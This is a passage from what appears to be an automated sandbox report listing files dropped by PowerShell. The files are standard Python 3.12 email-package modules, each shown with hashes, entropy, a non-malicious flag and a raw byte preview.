                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1958
                                                                                                    Entropy (8bit):5.157569944553099
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:7moh6OD9UscLNoQnTfS1NX3wksNVqAPqN7qta:yoh6OFGoafSf7MVqAPW7f
                                                                                                    MD5:CF1C0ADF9F91AA7CEAA166CB2E2BA37B
                                                                                                    SHA1:6A69C684B0B4AB200BAC9292D1B8B41872D45934
                                                                                                    SHA-256:10DB27BF1694522A68CF8A8F7730EAEBA8AB8C623C75FB6418340366EAEE8E73
                                                                                                    SHA-512:5E61004050055A8F9811B8201E507429DC260E20941E5B40EDE540281A50D87715D86CF8744DFAB818F4F9A3252A0981BFDA8E86642E4B3B0030A98323BD5AA8
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f!.........................(.....d.Z.g.d...Z.d...Z.d...Z.d...Z.d...Z.y.).z?A package for parsing, handling, and generating email messages.)...base64mime..charset..encoders..errors..feedparser..generator..header..iterators..message..message_from_file..message_from_binary_file..message_from_string..message_from_bytes..mime..parser..quoprimime..utilsc.....................<.....d.d.l.m.}.....|.|.i.|.....j...................|.........S.).zvParse a string into a Message object model... Optional _class and strict are passed to the Parser constructor.. .........Parser)...email.parserr......parsestr)...s..args..kwsr....s.... .LC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\email\__init__.pyr....r........s".........$....4....3.....(..(....+..+.....c.....................<.....d.d.l.m.}.....|.|.i.|.....j...................|.........S.).z|Parse a bytes string into a Message object model... Optional _class and strict are passed to the Parser constructor.. r.....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8345
                                                                                                    Entropy (8bit):5.455433023856351
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:HxRpL+TEgH5n14qSWZd8h7j0Og9WaXV3N6tXNariL:HxRN+4g5n2qSWEh7j0Odaut9aG
                                                                                                    MD5:85459A1B92083F07F68A35474F669F1A
                                                                                                    SHA1:E7C6ACDE732E9252C3B4776E5D1BA9D113D8F6AA
                                                                                                    SHA-256:28A1EBB9EF0BA48B84174E561AC290CA47BF7D4EAFE70DB713B0A2E65B384A0B
                                                                                                    SHA-512:CAF21B564FCEE463C6A3BB31C87AB8C8A191C4F0F172D461A0C19CD79DB43633F017FA985CF7478F3DC7E1C0F814E0C30F17810F145E0ED539707EBF070AB83B
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.fF"........................2.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z...e.j.....................e.j...................d.........j...................d...........Z.d...Z...G.d...d.e.........Z...e.........Z.d.e...e.d.........<...d...Z.d...Z.d...Z.d...Z.d...Z.e.e.d...Z.d...Z.e.e.d...Z.e.e.d...Z.d.d...Z.y.).z. Routines for manipulating RFC2047 encoded words...This is currently a package-private API, but will be considered for promotion.to a public API if there is demand........N)...ascii_letters..digits)...errors)...decode_q..encode_q..decode_b..encode_b..len_q..len_b..decode..encodes....=([a-fA-F0-9]{2})c.....................f.....t.........j...................|.j...................d.........j...................................S.).N.....)...bytes..fromhex..groupr....)...ms.... .RC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\email\_encoded_words.py..<lambda>r....A...s ......%.-.-........... 1. 1. 3..4.......c.....................@..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23304
                                                                                                    Entropy (8bit):4.977218144505305
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Mfmff5f3fIUmqWYy9yRxl1aZqQu0xC020arasoie3lg63pqqiscdFecKXhXX8i3m:MGLm3njImE0arjZQ263pqiESt5m
                                                                                                    MD5:5826B3D387D7F1DA9F46D5313939E300
                                                                                                    SHA1:DD0F9E96E8B960A3470044450AA80E9747EBBFEF
                                                                                                    SHA-256:C6DA3A91D391424EFD1788471DED8CE2669DCBA51B0C62D43D9ADE54EA846717
                                                                                                    SHA-512:8ACADFCCAE4A36F999323FBD4F792D59397B934D22BFBDB35F77DF5D55EDE74E58EA6EA6383CB7D0F3682E6957D0727BAE8B1F8BCFF6A0BB18E1D2DC7E0C2DE2
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f.G.............................d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.g.d...Z.g.d...Z.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z...G.d...d.........Z...G.d...d.e.........Z.y.).zcEmail address parsing code...Lifted directly from rfc822.py. This should eventually be rewritten..)...mktime_tz..parsedate..parsedate_tz..quote.....N.. ..z., )...jan..feb..mar..apr..may..jun..jul..aug..sep..oct..nov..dec..january..february..march..aprilr......june..july..august..september..october..november..december)...mon..tue..wed..thu..fri..sat..sunip...i....i....i....iD...i....)...UT..UTC..GMT..Z..AST..ADT..EST..EDT..CST..CDT..MST..MDT..PST..PDTc.....................H.....t.........|.........}.|.s.y.|.d.......d.|.d.<...t.........|.........S.).zQConvert a date string to a time tuple... Accounts for military timezones.. N.....r....)..._parsedate_tz..tuple)...data..ress.... .NC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\email\_parseaddr.pyr....r....-...s
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18231
                                                                                                    Entropy (8bit):5.1632257626752756
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:fsiLRUZPQSIBjiOai/AZupPdEGApMc5jeax0M2G7XGXWGo2r:f9Lc4rxm77em2
                                                                                                    MD5:594339840EB28A652E5A8610C7CE43C2
                                                                                                    SHA1:6505AAA727D2E0FD541AAC0507A69C6BEE2D4A30
                                                                                                    SHA-256:74DAF011A18E5908AF36197E463A312BF5B70F16D48D79532352FDAA4E5BABD9
                                                                                                    SHA-512:C44348AC68D8B8BB8EA92517192507124A25A93D8A196EB5B7C94354FCFEB16C6A1F917920C1A0A12C68F7E07C49B28003F1C4A8BE04CB86637D2BA3DCD5CF54
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.fW<.............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z...G.d...d.........Z.d...Z.d...Z...G.d...d.e.e.j.............................Z.e...G.d...d.e.................Z...e.........Z.y.).zwPolicy framework for the email package...Allows fine grained feature control of how the package parses and emits data.......N)...header)...charset)..._has_surrogates)...Policy..Compat32..compat32c.....................:.......e.Z.d.Z.d.Z...f.d...Z.d...Z.d...Z.d...Z.d...Z...x.Z.S.)..._PolicyBasea....Policy Object basic framework... This class is useless unless subclassed. A subclass should define. class attributes with defaults for any values that are to be. managed by the Policy object. The constructor will then allow. non-default values to be set for these attributes at instance. creation time. The instance will be callable, taking these same. attributes keyword arguments, and returning a new instance. identical to the called instance e
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3989
                                                                                                    Entropy (8bit):5.510545247428225
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:iFncbReNF+6+V0rQ9ysk3IKig2YtzX78okRSvggndf:gcle3nE05ynYtzqgYgn5
                                                                                                    MD5:A200C3DB7295364E7511BB928AA4BEE2
                                                                                                    SHA1:1B30D0BECAB4856C32BAAEAF393F5B4A25E1C7FD
                                                                                                    SHA-256:5FCABEE357147163F9582C2D71C45552628A4374EA3538B9F0DF59E698A6C8F9
                                                                                                    SHA-512:F1154BEC715F549B8BE364AECE60A337E53EE3D95A0DC2BEBB4D167A643C114550AC2E9D0B463F115C142B9F055CA4ACFAC8212536E6879DA39A8203CF8A109C
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.fR.........................d.....d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d...Z.d.d...Z.d.e.f.d...Z.d...Z.e.Z.e.Z.y.).a....Base64 content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit.characters encoding known as Base64...It is used in the MIME standards for email to attach images, audio, and text.using some 8-bit character sets to messages...This module provides an interface to encode and decode both headers and bodies.with Base64 encoding...RFC 2045 defines a method for including character set information in an.`encoded-word' in a header. This method is commonly used for 8-bit real names.in To:, From:, Cc:, etc. fields, as well as Subject: lines...This module does not do the line wrapping or end-of-line character conversion.necessary for proper internationalized headers; it only does dumb encoding and.decoding. To d
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15287
                                                                                                    Entropy (8bit):5.437123717646531
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Gg1ZVD+ZadGfz/pkyZZ4ybmbyxkudCdG5bY:bhDk/7pszuZ5bY
                                                                                                    MD5:B0C5C42843A23DCDCA8F22575C76865A
                                                                                                    SHA1:63D48ABAB72A0AA6F018FB41C02000DD1E3EB8D9
                                                                                                    SHA-256:E984422484FA9A5A652BC0AC365AA19370A6E4901183AA8DE44D285A92A11A9A
                                                                                                    SHA-512:54D5EA8E8EACB7AFAE2606A5F985311582C763033C51ECA12268614CD30F23343807BDC59F14D5A665B9C3ADDC0777333EDA861DE1A1F5459D86DC310F220ABD
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f5D..............................g.d...Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.d...d.e.e.d.f...d.e.e.d.f...d.e.d.d.f...d.e.d.d.f...e.d.d.f.e.e.d.f.e.e.d.f.d ....Z.i.d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d...d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d.d.d.d2d.d3d.d4....Z.d5d6d.d7..Z.d.d8..Z.d9..Z.d:..Z.d;..Z...G.d<..d=........Z.y.)>)...Charset..add_alias..add_charset..add_codec.....)...partialN)...errors)...encode_7or8bit......................us-asciiz.unknown-8bit..z.iso-8859-1z.iso-8859-2z.iso-8859-3z.iso-8859-4z.iso-8859-9z.iso-8859-10z.iso-8859-13z.iso-8859-14z.iso-8859-15z.iso-8859-16z.windows-1252..viscii).NNN..big5..gb2312z.euc-jp..iso-2022-jp..shift_jis..utf-8).r....z.koi8-rr......latin_1z.latin-1..latin_2z.latin-2..latin_3z.latin-3..latin_4z.latin-4..latin_5z.lat
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2128
                                                                                                    Entropy (8bit):5.24522344192699
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:hRmyMb+TT5rqIgNfx2mdGKg6FDEzXTGTa/ruyhBmu/JMpKMx2RFmg4jcqOwrK7:XmFbZPB0m46FYjTQa/ru+9Mxo/4HOwrE
                                                                                                    MD5:A0BEF4C1F9EB41C44498451B54C11C78
                                                                                                    SHA1:0630CE79142C820654121DFCAE1BAE0CF2C40FC5
                                                                                                    SHA-256:33F3DD12CFC715E32FEA420EBBBBF33377A6E40774A0A1ACDF056183F827AB4B
                                                                                                    SHA-512:CF18837FAE40C4DCA04AA70987A14BB8FE164BC72630192C034D34AF0F1737FB1C8DDE8629E7EDD955A18EEB6B2C9137405E3E5699299009E92E6C73D65237E9
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f3.........................F.....d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d...Z.d...Z.d...Z.d...Z.d...Z.y.).z Encodings and related functions.)...encode_7or8bit..encode_base64..encode_noop..encode_quopri.....)...encodebytes)...encodestringc.....................@.....t.........|.d...........}.|.j...................d.d.........S.).NT)...quotetabs..... s....=20)..._encodestring..replace)...s..encs.... .LC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\email\encoders.py.._qencoder........s............T..*.C....;.;.t.V..$..$.....c.....................~.....|.j...................d...........}.t.........t.........|.........d.........}.|.j...................|...........d.|.d.<...y.).zlEncode the message's payload in Base64... Also, add an appropriate Content-Transfer-Encoding header.. T....decode..ascii..base64..Content-Transfer-EncodingN)...get_payload..str.._bencode..set_payload....msg..orig..encdatas.... r....r....r........s;...........?.?.$.?..'.D....(.4...'..*.G..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6879
                                                                                                    Entropy (8bit):4.929632144684434
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:aYDQgFYYKvxJ879J58Ce/0J3B4iq7Y1Am70o0IoxDQmbeXCX17S6S+b:aiTFYYKvxJ879J58CQ0J3B4iq7Y1AJoA
                                                                                                    MD5:6616DDD0F972ED1E5F41E023E3EA2E51
                                                                                                    SHA1:642A04AFC0B120482D9A45C28DEC7E8CCA18D715
                                                                                                    SHA-256:BC3562F3540382A146475E3CD7F64E92885255E0D0DB3088D0867DCCBFEC5F17
                                                                                                    SHA-512:E4FAD2C39171F78A528E1A9918AF18B24472C2FB764958A4A617C91DDDE3CDB0CE979486D9A38D457843273ABEB8244FA45E1017AE07EFC12F4F9A4F5E94C69D
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f..........................J.....d.Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.e.Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d e.........Z...G.d!..d"e.........Z...G.d#..d$e.........Z...G.d%..d&e.........Z...G.d'..d(e.........Z...G.d)..d*e.........Z...G.d+..d,e.........Z...G.d-..d.e.........Z...G.d/..d0e.........Z...G.d1..d2e.........Z...G.d3..d4e.........Z.y5)6z email package exception classes.c...........................e.Z.d.Z.d.Z.y.)...MessageErrorz+Base class for errors in the email package.N....__name__..__module__..__qualname__..__doc__........JC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\email\errors.pyr....r.................5r....r....c...........................e.Z.d.Z.d.Z.y.)...MessageParseErrorz&Bas
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19887
                                                                                                    Entropy (8bit):4.938480256659219
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:sNtVXoP7tPeB3bid8HkwY++IIuzxFXZP9XDT:sNbXI2KLwY++II+FZhT
                                                                                                    MD5:2642E61AA52B486D63BEEFB4590620E7
                                                                                                    SHA1:A5BB177FAB543DF608CA7F6D624D023F17DDABEC
                                                                                                    SHA-256:3F61D2A365D57123E2C50343A2EC0AB4D848CCE96D4BA604242042CC30E274D1
                                                                                                    SHA-512:7AC85DBBDC27EF850D440BF087AB8F5398E98BA1FACB9397255027F3DE98CEEE01F471315C0696018111BC4EFADAC1B65B92A5D51A378F3637BC64AC08FDA7A4
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f"[........................R.....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z.d.Z.d.Z...e.........Z...G.d...d.e.........Z...G.d...d.........Z...G.d...d.e.........Z.y.).a....FeedParser - An email feed parser...The feed parser implements an interface for incrementally parsing an email.message, line by line. This has advantages for certain applications, such as.those reading email messages off a socket...FeedParser.feed() is the primary interface for pushing new data into the.parser. It returns when there's nothing more it can do with the available.data. When you have no more data to push into the parser, call .close()..This completes the parsing and returns the root message object...The other advantage of this parser is that it will never raise a parsing.exception. Instead,
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24613
                                                                                                    Entropy (8bit):5.324056612727556
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:HWILAjH7z0oV85u5tzfSN1IPMp4hA/blqBFyFjZu7KfiF0AUlywc4tPFj5xjX2Pp:HWcATUy8581SEPMp4OSglu7KfIUPX2x
                                                                                                    MD5:DD9488B225AB55A5CFF075CED0EFB68D
                                                                                                    SHA1:56E2C8E31013EB903632E396376D19B006799E3E
                                                                                                    SHA-256:40E87267B88A687A1B8124AAD483D4156487F562E11A46EEA1CC6FFB92DBCDEA
                                                                                                    SHA-512:F664A526C3F58D703CA36CB5D05A4A054681871F87FD4319F325FB20E92415B2D1D43DE386A110168EF40063C2A92F5D0DC8CA16A256CD9DF168DD427CE42A0C
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.fY`.............................d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j...................Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...e.d.........Z...e.d.........Z...e.j*..................d.e.j,..................e.j...................z...........Z...e.j*..................d.........Z...e.j*..................d.........Z.e.j6..................j8..................Z.d...Z.....d.d...Z...G.d...d.........Z...G.d...d.........Z ..G.d...d.e!........Z"y.).z+Header encoding and decoding functionality.)...Header..decode_header..make_header.....N)...HeaderParseError)...charset..... ..... z. ...N...z. ...us-asciiz.utf-8ai.... =\? # literal =?. (?P<charset>[^?]*?) # non-greedy up to the next ? is the charset. \? # literal ?. (?P<encoding>[qQbB]) # either a "q" or a "b", case insensitive. \? # literal ?. (?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string. \?=
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2858
                                                                                                    Entropy (8bit):5.4200220398411565
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:qmdJ9ILiqKxHzcVsSSYBxzvfrBoHIyfnOJfMbh1FLxIeUiGnuJvjaUcYwV:7zI0/6ezOFMbhnxIYJvgV
                                                                                                    MD5:FEE80B6D97576874696A43378A51DD1D
                                                                                                    SHA1:1CA03669BBD9D49055E7292B5ED89B8006E21BB2
                                                                                                    SHA-256:FBA652F6568E439091086A74A70C9DF5A0AD96F6750488974539EBCC458B6815
                                                                                                    SHA-512:B791AF68ED2F661687E8A6BBEF996CB794A6B64EB22F726AA23194B5A0C37E711F068EAF6E2679B4AD8700FBB6803A7DE16C34DFDF35274A04F3DBC02A817603
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f..........................B.....d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d...Z.d.d...Z.d.d...Z.d.d...Z.y.).z1Various types of useful iterators and generators.)...body_line_iterator..typed_subpart_iterator..walk.....N)...StringIOc................#.......K.....|.......|.j...........................r.|.j...........................D.]...}.|.j...........................E.d.{.................y.y.7.....w.).z.Walk over the message tree, yielding each subpart... The walk is performed in depth-first order. This method is a. generator.. N)...is_multipart..get_payloadr....)...self..subparts.... .MC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\email\iterators.pyr....r........sH..............J.................'..'..)....&.G....|.|.~..%..%....&.......%.s.....;A....A....A..c................#.......K.....|.j...........................D.]8..}.|.j...................|...........}.t.........|.t.................s..&t.........|.........E.d.{..............:..y.7.....w.).z.Iterate o
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):53073
                                                                                                    Entropy (8bit):5.390780772069332
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:/QPmvSbfTj3cQ3iPM+jWN/Yq0HYVLvw4Mefu9eBjdgI7oCcABQqJXTREV:2AyrLkXQgp8rA9eld1ch8XT6V
                                                                                                    MD5:CD0CA6BBC2366F700CF6E5BE29C94863
                                                                                                    SHA1:6628A9DBC3FFF1483848D15CCD51E0E1A61BCFF5
                                                                                                    SHA-256:52E8CE94F35258E01B9261B1BCB8FDE57402EA5AF486AC739E37AB7B4BA69E02
                                                                                                    SHA-512:AD30A54FEF5757699F6969E99CAF94F03CF82303C96129622C9FCA32E173539E5E3F91AF7BAC6E33D7C6A4AAC86BD86EDFE791B54F2F9B57F03DAB585ACA69E2
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f................................d.Z.d.d.g.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j"..................Z.d.Z...e.j&..................d.........Z.d...Z.d.d...Z.d...Z.d...Z.d...Z...G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.).z8Basic message object for the email package object model...Message..EmailMessage.....N)...BytesIO..StringIO)...utils)...errors)...compat32....charset)...decode_bz.; z.[ \(\)<>@,;:\\"/\[\]\?=]c..........................t.........|.........j...................d.........\...}.}.}.|.s.|.j...........................d.f.S.|.j...........................|.j...........................f.S.).N..;)...str..partition..strip)...param..a..sep..bs.... .KC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\email\message.py.._splitparamr........sH...........E....$..$.S..).I.A.s.A.......w.w.y.$.........7.7.9.a.g.g.i...........c..........................|...t.........|.........d.k
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6785
                                                                                                    Entropy (8bit):5.051004234228529
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:4nVkrtgE+ueYRgfG4Pl0WjZGHMeJtp++ett+2jFZ5NlJ3yJI8:wgtgE+sRgf9aWXeJtpA+iLD33y28
                                                                                                    MD5:0FFF91D7284C7DADD017489A8912601B
                                                                                                    SHA1:79CA1F609C9EE49AA763C2E011FB10ADF63DC8F3
                                                                                                    SHA-256:14CBD8E37020397E98A108E36CD34A35411C8F0820FC624453724F010F4382DB
                                                                                                    SHA-512:10B5921257D7F19BFF27226AE8708F2130CAAE5452540AC85517F87A555BCF7539961BF085D48693BF3E2D196635C4316B6BA98FB8C66D38A7109F34A512D4B3
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f...............................d.Z.g.d...Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....G.d...d.........Z...G.d...d.e.........Z...G.d...d.........Z...G.d...d.e.........Z.y.).z-A parser of RFC 2822 and MIME email messages.)...Parser..HeaderParser..BytesParser..BytesHeaderParser..FeedParser..BytesFeedParser.....)...StringIO..TextIOWrapper).r....r....)...compat32c.....................*.....e.Z.d.Z.d.e.d...d...Z.d.d...Z.d.d...Z.y.).r....N....policyc..................... .....|.|._.........|.|._.........y.).a....Parser of RFC 2822 and MIME email messages... Creates an in-memory object tree representing the email message, which. can then be manipulated and turned over to a Generator to return the. textual representation of the message... The string must be formatted as a block of RFC 2822 headers and header. continuation lines, optionally preceded by a `Unix-from' header. The. header block is terminated either by the end of the string
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10007
                                                                                                    Entropy (8bit):5.681937295697425
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:nJEGQ2S1AHLQwZzscqG2FhoPkFXShdJstHifPh:nVpjtjqv3oMFiQYf5
                                                                                                    MD5:23BC68ACA7769D63A4980430C9C40893
                                                                                                    SHA1:16D44FD0DA999E6CCD61547C5E7C29E2AE0173F8
                                                                                                    SHA-256:5B4E1C4CA87656365432ACAC18D9F91301BA58380EA9D64B32E74ADA62FE792C
                                                                                                    SHA-512:BF0B38B3BA616542FBCC991C7A665FFAE2E762EE275A7EEB46874E202ED427CA01BE0FAB87DD020B1A4E89C36093F914EBF69D96EBE58F5C57F6DBB9B5D2E2CE
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f.'..............................d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.Z.d.Z.d.Z...e.d.........D...c.g.c.]...}.d.|.z.........c.}.Z.e.d.d...Z.e.d.d...Z.d...e.j...................d.........z.....e.j...................d.........z...D.]...Z...e.e.........e.e.<.......d.e...e.d.........<...d.D.]...Z...e.e.........e.e.<.......d...Z.d...Z.d...Z.d...Z.d.d...Z.d...Z.d...Z.d.d...Z.e.d.d...Z.d.D.]...Z...e.e.........e.e.<.......[.d.e.f.d...Z.e.f.d...Z.e.Z.e.Z.d...Z.d...Z y.c...c.}.w.).aF...Quoted-printable content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to.safely encode text that is in a character set similar to the 7-bit US ASCII.character set, but that includes some 8-bit characters that are normally not.allowed in email bodies or headers...Quoted-printable is very space-inefficient for encoding binary files; use the.email.base64mime
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12794
                                                                                                    Entropy (8bit):5.503389791847678
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:mP8j8UFSwGHm+BsaSFXZMABzWzGljP0NE:mEj8UnGGqsaSXZtZDNP0e
                                                                                                    MD5:13B268AF8A726770D9174D8E2086E841
                                                                                                    SHA1:7366742C38B6C91A79F621BEE052EC08B7DE0B51
                                                                                                    SHA-256:4DD7999A2E3E6BD45CC9205856A1BE94AF8F01E915140DCEBFF35C5071684287
                                                                                                    SHA-512:515CA2869620EB955D256D72C92CE85229EF19644EC51C841F1B75E624A778A25BE1DA2E622899A0175187B565AE4F3CAA8F8CF82C92D8461DFA57DABA3E3532
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.fe1.............................d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z...e.j2..................d.........Z...e.j2..................d.........Z.d...Z.d...Z.d d...Z.d...Z.d...Z d!d...Z!d"d...Z"d#d...Z#d...Z$d...Z%d...Z&d...Z'd#d...Z(..e.j2..................d.e.jR..........................Z*d...Z+....d$d...Z,d#d...Z-y.)%z.Miscellaneous utilities.)...collapse_rfc2231_value..decode_params..decode_rfc2231..encode_rfc2231..formataddr..formatdate..format_datetime..getaddresses..make_msgid..mktime_tz..parseaddr..parsedate..parsedate_tz..parsedate_to_datetime..unquote.....N)...quote)...AddressList).r....).r....r......_parsedate_tz)...Charsetz., ..z.....'z.[][\\()<>@,:;".]z.[\\"]c.....................D.......|.j.............................y.#.t.........$.r...Y.y.w.x.Y.w.).z;Return True if s may contain surrogate-escaped binary data.FT)...encode..UnicodeEncodeError)...s
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8774
                                                                                                    Entropy (8bit):4.669757481893706
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:F2gPi1IygNGhdRBp8+HAe+izJkpVkgnrVeqD6kec8ZnN2ENGKTK:F2gPimygNGhjUpBVkgkqD6n9eEh+
                                                                                                    MD5:DD5C15C6C8497B37895EE2DD40483EBC
                                                                                                    SHA1:F6ACB572029D7CD2D41625C7F0DED5B8EB6A313D
                                                                                                    SHA-256:154F585498454CA829DCD44BB89355FF8C7965B1B6692D1AC0293E7553DBBABD
                                                                                                    SHA-512:140555C8F17669C2AC624E0E354021ECAA7F4F24AC6DDA3A1DD19A74371BFCC3FC0C714061362DE84EC8456ECB3381FF6C7D328C4EF25CDA3061C90EBE273324
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:""" Routines for manipulating RFC2047 encoded words.....This is currently a package-private API, but will be considered for promotion..to a public API if there is demand....."""....# An ecoded word looks like this:..#..# =?charset[*lang]?cte?encoded_string?=..#..# for more information about charset see the charset module. Here it is one..# of the preferred MIME charset names (hopefully; you never know when parsing)...# cte (Content Transfer Encoding) is either 'q' or 'b' (ignoring case). In..# theory other letters could be used for other encodings, but in practice this..# (almost?) never happens. There could be a public API for adding entries..# to the CTE tables, but YAGNI for now. 'q' is Quoted Printable, 'b' is..# Base64. The meaning of encoded_string should be obvious. 'lang' is optional..# as indicated by the brackets (they are not part of the syntax) but is almost..# never encountered in practice...#..# The general interface for a CTE decoder is that it takes the enc
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
